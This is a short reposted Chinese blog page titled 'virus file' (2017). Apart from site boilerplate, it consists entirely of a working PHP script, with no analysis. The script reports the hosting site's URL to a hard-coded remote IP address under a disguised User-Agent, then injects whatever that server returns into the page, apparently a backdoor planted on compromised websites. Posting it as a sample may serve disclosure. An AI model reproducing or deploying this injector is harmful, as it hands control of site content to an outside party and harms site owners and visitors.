首页 > 其他 > 详细

病毒文件

时间:2017-04-28 18:15:30      阅读:228      评论:0      收藏:0      [点我收藏+]
<?php
set_time_limit(0);

header("Content-Type: text/html;charset=gb2312");
$Rermote_server = "http://107.151.66.90:777/"; 
$host_name = "http://".$_SERVER[‘SERVER_NAME‘].$_SERVER[‘PHP_SELF‘];
$Content_mb=getHTTPPage($Rermote_server."/index.php?host=".$host_name);

function getHTTPPage($url) {
    $opts = array(
      ‘http‘=>array(
        ‘method‘=>"GET",
        ‘header‘=>"User-Agent: aQ0O010O"
      )
    );
    $context = stream_context_create($opts);
    $html = @file_get_contents($url, false, $context);
    if (empty($html)) {
        exit("<p align=‘center‘><font color=‘red‘><b>Connection Error!</b></font></p>");
    }    
    return $html;
} 

echo $Content_mb;
?>

 

病毒文件

原文:http://www.cnblogs.com/Abner3721/p/6782286.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!